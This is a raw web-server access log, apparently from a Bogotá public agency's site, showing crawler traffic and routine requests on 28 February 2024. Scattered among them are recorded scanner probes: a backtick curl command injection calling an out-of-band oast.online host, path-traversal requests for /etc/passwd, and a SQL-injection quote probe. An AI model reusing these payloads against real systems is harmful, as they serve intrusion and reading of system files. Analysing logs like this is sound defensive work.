201.245.192.253 - - [28/Feb/2024:01:24:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.19 - - [28/Feb/2024:01:24:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/0728.pdf HTTP/1.1" 200 335316
106.105.237.36 - - [28/Feb/2024:01:24:28 -0500] "\x16\x03\x01" 400 226
172.22.2.4 - - [28/Feb/2024:01:22:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/Feb/2024:01:23:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
186.102.72.119 - - [28/Feb/2024:01:25:23 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19DakF9nctInK7YWQhRpXPNnw0WtOK8jHdq5ItJW0zYqMocdlEFyFNLKD/EdrlpPqUjyeQH6qNLKGQyRtKkAEDXCI10FpAWGBuJxxUOJZ6XDa7rh0NCT6aihJXAlhHUhpxWJAD8vXi4SVBFIGh+iixmxcOVIuBg33kh8xFegRVi1oib/4zoE8JCN0Tp51cQq2vvQDqi4lBe+a9hHtMdseHR2+ebE27TVngSWznsLLYiVbHVYMysC79BUelrrrrjkK072IdY6IJ8rA==&u=U2FsdGVkX1+AXxkrElYpi0sfq4jJc12rcGAEGc5jwwoZDcW3cmZiXpM+UXIre29Y&y=U2FsdGVkX18JmX7a+uta7BURfvJYDqQWK97dOQ9l5pZGGjetofFrefmvwmXpcNUU HTTP/1.1" 200 26
186.102.72.119 - - [28/Feb/2024:01:25:23 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX182GRybJW/7H3mP0sQTw43duK9TJqkEh244BvuSZ7ExsctPVG7ZfeVKdDhIcPcG5AdPDxulDc7LkZh+JMaxUwx6+XAj6itDCXDB6NJUSkJvixewdgdW6993tx93A+4YN3V/suHpaG38/bugvqzpyZYnyPirK/AH9fm5RY9xw+wXoZGdlu7gj9f7l/NO2ISbaeNNzp+d2lfimaUHOE2BKkf3/1IGajMzXjpECSRPTB+HCKvlbu7pEX4HcCjlAQ852ht/yOAmlLp8mmM7HGCU/1IwsIO+yCakQT6YaUtmo2RFppqYq7D1pLDCD4Rh/ZsvN08PBSeQp7UbBCwxLhQyQMaWDIPc6AaPsN2JTTK7rMBbWihASA7XrUPF5kh8860Tc6Ihux52mcUTnfFAV/OckgQOKg5rX42V7eKezilIA+VUsqM8cSRK+znon5XTYW5roJP2Mm+DCJ93liYfydlZLNRkaaJxR2hXmUfmIQJ/q2vMr6RKKWA2a0AU0o8bCwPDbIuvXg2jgv7lzZgltPiC2Nd0vhaY+rDUTQvUiUI/ubBC4lJHUVDm1Vo7yofFuKvY6l/HKE6MeWDeWCiZ4YdM3+IdFE1nW9wNubEt2xRWrWvlyd2JQD9vbKZMDwXS8YPd+KDibhkdpvhRQtoyoHYVAW+sMNG2q1ausNMD8ykJWX+PmMK3oidBisrGV1KcDfSYyEM5SmkF9urmVjmdrLNdq82covXnwE9EJvpVETZY+31q0ajSaQOkJX88yqMXyhhy6oEnsqmDT+Hw6b0s5w+vgvnvExXxscu/WvACWKhHwGY8h3ID+m6kOL6iNVYzNQx8HeBl+4yE0qk52YUdckFUmgg76vGiVYU9D07sWQzQHUeVGZ6elrk+acdeEiP3Pf6oOYXc6tKtfn0eWyJrdTvLGYIBiIvJfHIUQq+pPAaYjWu7HYKWq6idKFiEeRIreUxvwCbW3AXIK0z5VzTIleHQyQM8bAK+fS64J52VT+5OcO0/8vdYSziASE3sZlsZAjBIVokTnG0VB5qQctzqjqZohSYnsOwYS6s+vMh++njCFyCByUifPt4H02mUYLt7KLoIMiJl9rYuABaV32KjHQa1ZtkgVoZ0BZJ90zxLCzWhaHlNypyk8FbNp04XMv6VgMy6i2kg++wJqvu3n76/Xw43r8vv7wlPFKruGhAIxJzOdZ//ynlFiDbRVr6D60czA0TCqUoZZ1Jf39cKtV6na9DzVNGg31SrlGEsv1KtQjAEsFqsmxw/p+3sxa+URg7reFdDfk3ZvQuB5iKpWn/3sFPJolhHCYWWitDi3ZKyLzdufxsWfWm7CaLggLEu/0kGkZNl13x6HfS1RmLF+LpF3klHyinKw1LtJ2Bh4z8fOVgxidIntsoUC4GQxcOG7eM16WS0MzvudyHCJVwBwyrA5gpQXyylbkWw68cD3C9BkpK5qkCfAeqYTBVWpPd9/H5XSuA8Imm6BklGwnFHDwt88wYwu32MAS0GzX+gsIm7hgbuTq7DDmCaTAA7018LQAr9zNzwC2zZ5BN93nLm9dIXHXZjz1CWHrlXQAORMFw=&u=U2FsdGVkX1+AXxkrElYpi0sfq4jJc12rcGAEGc5jwwoZDcW3cmZiXpM+UXIre29Y&y=U2FsdGVkX18JmX7a+uta7BURfvJYDqQWK97dOQ9l5pZGGjetofFrefmvwmXpcNUU HTTP/1.1" 200 26
186.102.72.119 - - [28/Feb/2024:01:25:25 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18EiCUlMvH8PRifaaiTsNhRBPDijecQ3pCAO89rGl/pP9237L4LjXuUHM6aNo0/cgtbg9FC7s5mtNGZsE13PxkxQJAbKQ+txJha+9MAZ5rHjAygCBIvSjSsesfRphfUczIY6FhzAzn7z6ufo28uuvYLAQZVp3t9/KE=&u=U2FsdGVkX1+AXxkrElYpi0sfq4jJc12rcGAEGc5jwwoZDcW3cmZiXpM+UXIre29Y&y=U2FsdGVkX18JmX7a+uta7BURfvJYDqQWK97dOQ9l5pZGGjetofFrefmvwmXpcNUU HTTP/1.1" 200 26
186.102.72.119 - - [28/Feb/2024:01:25:25 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19RtaowdpJR7L46n6cOmTyA99L3A/mAYkMe/rWpwDS9gHbyAKYr75f0MBBVJ5ZKef9b/VsoFHEZuuV35c9gusx5EMoVEuXcGJWiSbuxMNAcL2mqZRjN6S1QW/0jaBjD4YJKSTZRfuiTuGlJWO8ih93F4hzBneQ6fY8=&u=U2FsdGVkX1+AXxkrElYpi0sfq4jJc12rcGAEGc5jwwoZDcW3cmZiXpM+UXIre29Y&y=U2FsdGVkX18JmX7a+uta7BURfvJYDqQWK97dOQ9l5pZGGjetofFrefmvwmXpcNUU HTTP/1.1" 200 26
186.102.72.119 - - [28/Feb/2024:01:25:25 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18wlDk1mKVGdFM7glzEGOncpnmHgUlIiZC8RWAEZA4+po44yvE9nUZofMje94XrWIOSyc/t55751AgwXhn4zMn2mq89L1h6621xkj3YxQQb9e1W6pEj2LGd3FkjKijid9KkIHY14U6ixqlK89vOjRCDySua8YL4SBo=&u=U2FsdGVkX1+AXxkrElYpi0sfq4jJc12rcGAEGc5jwwoZDcW3cmZiXpM+UXIre29Y&y=U2FsdGVkX18JmX7a+uta7BURfvJYDqQWK97dOQ9l5pZGGjetofFrefmvwmXpcNUU HTTP/1.1" 200 26
186.102.72.119 - - [28/Feb/2024:01:25:26 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/+TnXnL//R73HifPMfmWyrvwoj5H+HpgDlL6c0ln43pCdkN4b2T36OOkJzRujLoWfnP+WoILMoeAzbzvnU2jhJIw71r+yqwRGzkOi87ISxwOIKWFV9vglStObMaLpW+W/1Zn6nDycHWKwMYWWpqFMNog5rA/i1OxNGgtTWwEDzEK8p74E0ZLXXLVdEtqg9xyk/ix0YHkgBnQ==&u=U2FsdGVkX1+AXxkrElYpi0sfq4jJc12rcGAEGc5jwwoZDcW3cmZiXpM+UXIre29Y&y=U2FsdGVkX18JmX7a+uta7BURfvJYDqQWK97dOQ9l5pZGGjetofFrefmvwmXpcNUU HTTP/1.1" 200 26
186.102.72.119 - - [28/Feb/2024:01:25:36 -0500] "GET /kwssiamovil/sm/acme/u?s=U2FsdGVkX19b1Zzcm8alAZFY7Z18yzEssq4JJW1BiL+2iTmGy7MWwLeGA7xoa9wy79MfsU7iTcwy00XuJGhB5M0dBdOwMmBmB1cVvRj25HlE06gxfGzhAgt8P6AsAp9+ByfPeIlla4QpKIzSNxV1aNN9oW7GrGPQpEQYXco2YGA=&u=U2FsdGVkX1+AXxkrElYpi0sfq4jJc12rcGAEGc5jwwoZDcW3cmZiXpM+UXIre29Y&y=U2FsdGVkX18JmX7a+uta7BURfvJYDqQWK97dOQ9l5pZGGjetofFrefmvwmXpcNUU HTTP/1.1" 200 60
201.245.192.253 - - [28/Feb/2024:01:25:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
106.105.237.36 - - [28/Feb/2024:01:26:06 -0500] "\x16\x03\x01" 400 226
201.245.192.253 - - [28/Feb/2024:01:26:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:01:26:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39446
216.245.221.92 - - [28/Feb/2024:01:26:59 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Feb/2024:01:26:17 -0500] "POST /BLA/boletinlegal/index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1" 200 36811
152.61.128.50 - - [28/Feb/2024:01:27:33 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [28/Feb/2024:01:27:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [28/Feb/2024:01:26:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
201.245.192.253 - - [28/Feb/2024:01:28:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
59.127.10.98 - - [28/Feb/2024:01:28:20 -0500] "\x16\x03\x01" 400 226
66.249.66.19 - - [28/Feb/2024:01:28:34 -0500] "GET /BLA/resoluciones/AUTOS%202008/1027.pdf HTTP/1.1" 200 165474
66.249.66.21 - - [28/Feb/2024:01:29:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/0228.pdf HTTP/1.1" 200 240848
40.77.167.24 - - [28/Feb/2024:01:29:39 -0500] "GET /documents/10184/4893230/contenedor-para-bater%C3%ADas-de-litio.jpeg/8c2184da-6967-48bb-8109-ccef3d3b37be?t=1687366337089 HTTP/1.1" 404 1034
201.245.192.253 - - [28/Feb/2024:01:29:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39615
201.245.192.253 - - [28/Feb/2024:01:29:49 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33394
201.245.192.253 - - [28/Feb/2024:01:29:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:01:29:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39625
201.245.192.253 - - [28/Feb/2024:01:30:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [28/Feb/2024:01:28:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/Feb/2024:01:30:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33394
172.22.2.4 - - [28/Feb/2024:01:29:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59083
66.249.66.20 - - [28/Feb/2024:01:31:12 -0500] "GET /Residuos/quimicos/files/guia_quimicos.pdf HTTP/1.1" 200 15440844
201.245.192.253 - - [28/Feb/2024:01:31:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:01:31:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39446
216.245.221.92 - - [28/Feb/2024:01:32:00 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Feb/2024:01:32:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
190.158.201.175 - - [28/Feb/2024:01:32:46 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 40376
190.158.201.175 - - [28/Feb/2024:01:32:50 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:32:51 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:32:51 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:32:51 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:32:52 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1392
66.249.66.20 - - [28/Feb/2024:01:33:22 -0500] "GET /BLA/resoluciones/Notificaciones/REGISTROS%202022/00006.pdf HTTP/1.1" 200 406233
190.158.201.175 - - [28/Feb/2024:01:33:45 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 5202
201.245.192.253 - - [28/Feb/2024:01:33:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
190.158.201.175 - - [28/Feb/2024:01:33:51 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 151730
190.158.201.175 - - [28/Feb/2024:01:33:58 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:33:59 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:33:59 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:33:59 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Feb/2024:01:34:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
69.63.189.120 - - [28/Feb/2024:01:34:37 -0500] "GET /images/31%20de%20enero%20humedal%20La%20Conejera.jpg HTTP/1.1" 200 33808
69.63.189.119 - - [28/Feb/2024:01:34:40 -0500] "GET /images/30%20de%20enero%20Entrenubes%20alcalde.jpeg HTTP/1.1" 200 64486
69.63.189.117 - - [28/Feb/2024:01:34:40 -0500] "GET /images/25%20Incendio%20declaratoria.jpeg HTTP/1.1" 200 90327
69.63.189.119 - - [28/Feb/2024:01:34:40 -0500] "GET /images/Rueda%20de%20prensa.jpeg HTTP/1.1" 200 58715
69.63.189.118 - - [28/Feb/2024:01:34:40 -0500] "GET /images/Comprimida%20incendios.jpg HTTP/1.1" 200 23316
69.63.189.5 - - [28/Feb/2024:01:34:40 -0500] "GET /images/24%20de%20enero%20sendero.JPG HTTP/1.1" 200 59121
172.22.2.4 - - [28/Feb/2024:01:34:58 -0500] "GET /BLA/boletinlegal/conceptos/ HTTP/1.1" 200 533
201.245.192.253 - - [28/Feb/2024:01:35:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [28/Feb/2024:01:34:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/Feb/2024:01:36:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
59.127.10.98 - - [28/Feb/2024:01:36:11 -0500] "POST /actions/authenticate.php HTTP/1.1" 404 1022
66.249.79.101 - - [28/Feb/2024:01:36:25 -0500] "GET /robots.txt HTTP/1.1" 404 1035
59.127.10.98 - - [28/Feb/2024:01:36:26 -0500] "GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1" 404 1035
66.249.79.100 - - [28/Feb/2024:01:36:25 -0500] "GET /portaldeninos/2021/05/27/proteger-la-comadreja-en-bogota-es-salvaguardar-la-biodiversidad-de-la-ciudad/ HTTP/1.1" 200 105709
66.249.79.100 - - [28/Feb/2024:01:36:29 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
66.249.66.21 - - [28/Feb/2024:01:36:31 -0500] "GET /BLA/resoluciones/Autos%202008/1964.pdf HTTP/1.1" 200 91704
201.245.192.253 - - [28/Feb/2024:01:36:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39446
172.22.2.4 - - [28/Feb/2024:01:35:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60730
216.245.221.92 - - [28/Feb/2024:01:36:59 -0500] "HEAD / HTTP/1.1" 200 -
211.21.229.118 - - [28/Feb/2024:01:37:47 -0500] "\x16\x03\x01" 400 226
172.22.2.4 - - [28/Feb/2024:01:37:49 -0500] "GET /BLA/boletinlegal/Circulares/ HTTP/1.1" 200 535
201.245.192.253 - - [28/Feb/2024:01:37:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:01:38:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.20 - - [28/Feb/2024:01:38:50 -0500] "GET /BLA/resoluciones/Notificaciones/REGISTROS%202022/02016.pdf HTTP/1.1" 200 408355
47.128.62.17 - - [28/Feb/2024:01:38:53 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202006%2FAUTOS%202006%201101-1200%2F&order=asc&sort=size HTTP/1.1" 200 21976
47.128.62.17 - - [28/Feb/2024:01:38:54 -0500] "GET /BLA/resoluciones/dlf/unknown.png HTTP/1.1" 200 266
47.128.62.17 - - [28/Feb/2024:01:38:54 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
201.245.192.253 - - [28/Feb/2024:01:39:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39615
201.245.192.253 - - [28/Feb/2024:01:39:49 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33394
201.245.192.253 - - [28/Feb/2024:01:39:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:01:39:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39625
201.245.192.253 - - [28/Feb/2024:01:40:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.20 - - [28/Feb/2024:01:40:41 -0500] "GET /BLA/resoluciones/AUTOS%202014/5790.pdf HTTP/1.1" 200 209080
201.245.192.253 - - [28/Feb/2024:01:40:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33394
201.245.192.253 - - [28/Feb/2024:01:41:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39446
201.245.192.253 - - [28/Feb/2024:01:41:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [28/Feb/2024:01:40:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [28/Feb/2024:01:41:59 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Feb/2024:01:42:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [28/Feb/2024:01:42:27 -0500] "GET /BLA/boletinlegal/include/makecvs.php?Event=%60curl+http%3a//cneqhp1enjjce7r1g3tgraqhfinhsptcf.oast.online+-H+'User-Agent%3a+yCQ5R4'%60 HTTP/1.1" 404 1038
66.249.66.21 - - [28/Feb/2024:01:42:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/4792.pdf HTTP/1.1" 200 379686
172.22.2.4 - - [28/Feb/2024:01:41:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59083
66.249.66.19 - - [28/Feb/2024:01:42:54 -0500] "GET /resoluciones/RESOLUCIONES%202008/4024.pdf HTTP/1.1" 404 1018
172.22.2.4 - - [28/Feb/2024:01:42:55 -0500] "POST /BLA/boletinlegal/assets/php/upload.php HTTP/1.1" 404 1208
201.245.192.253 - - [28/Feb/2024:01:43:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:01:44:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.38.76 - - [28/Feb/2024:01:44:37 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202004%2FRES%202004%201051-1100%2F&order=desc&sort=size HTTP/1.1" 200 12163
47.128.38.76 - - [28/Feb/2024:01:44:38 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
47.128.38.76 - - [28/Feb/2024:01:44:38 -0500] "GET /BLA/resoluciones/dlf/unknown.png HTTP/1.1" 200 266
172.22.2.4 - - [28/Feb/2024:01:45:32 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
201.245.192.253 - - [28/Feb/2024:01:45:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:01:46:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.19 - - [28/Feb/2024:01:46:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%203401%20AL%203500/RESOLUCION%203452%20DE%202007.pdf HTTP/1.1" 200 879345
201.245.192.253 - - [28/Feb/2024:01:46:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39446
216.245.221.92 - - [28/Feb/2024:01:47:00 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.152 - - [28/Feb/2024:01:47:28 -0500] "GET /BLA/resoluciones/AUTOS%202017/3574.pdf HTTP/1.1" 200 277305
172.22.2.4 - - [28/Feb/2024:01:46:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/Feb/2024:01:47:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.19 - - [28/Feb/2024:01:47:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202012/0415.pdf HTTP/1.1" 200 422093
201.245.192.253 - - [28/Feb/2024:01:48:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.114.211 - - [28/Feb/2024:01:48:19 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202003%2FRES%202003%201001-1050%2F&order=desc&sort=date HTTP/1.1" 200 11565
47.128.114.211 - - [28/Feb/2024:01:48:19 -0500] "GET /BLA/resoluciones/dlf/unknown.png HTTP/1.1" 200 266
47.128.114.211 - - [28/Feb/2024:01:48:19 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
172.22.2.4 - - [28/Feb/2024:01:46:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60730
66.249.66.19 - - [28/Feb/2024:01:48:53 -0500] "GET /BLA/resoluciones/Notificaciones/REGISTROS%202016/1856.pdf HTTP/1.1" 200 476499
201.245.192.253 - - [28/Feb/2024:01:49:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:01:50:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.21 - - [28/Feb/2024:01:51:15 -0500] "GET /resoluciones/RESOLUCIONES%202009/8244.pdf HTTP/1.1" 404 1018
211.21.37.120 - - [28/Feb/2024:01:51:16 -0500] "POST /auth/requestreset HTTP/1.1" 404 1034
201.245.192.253 - - [28/Feb/2024:01:51:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39446
172.22.2.4 - - [28/Feb/2024:01:51:52 -0500] "GET /BLA/boletinlegal/searchblox/servlet/FileServlet?col=9&url=/etc/passwd HTTP/1.1" 404 1038
201.245.192.253 - - [28/Feb/2024:01:51:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [28/Feb/2024:01:51:59 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Feb/2024:01:52:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.20 - - [28/Feb/2024:01:53:07 -0500] "GET /BLA/resoluciones/AUTOS%202014/5789.pdf HTTP/1.1" 200 208276
172.22.2.4 - - [28/Feb/2024:01:51:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/Feb/2024:01:53:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
211.21.37.120 - - [28/Feb/2024:01:54:06 -0500] "GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development HTTP/1.1" 404 1035
201.245.192.253 - - [28/Feb/2024:01:54:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
211.21.37.120 - - [28/Feb/2024:01:54:13 -0500] "POST /meaweb/os/mxperson HTTP/1.1" 404 1022
172.22.2.4 - - [28/Feb/2024:01:52:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55823
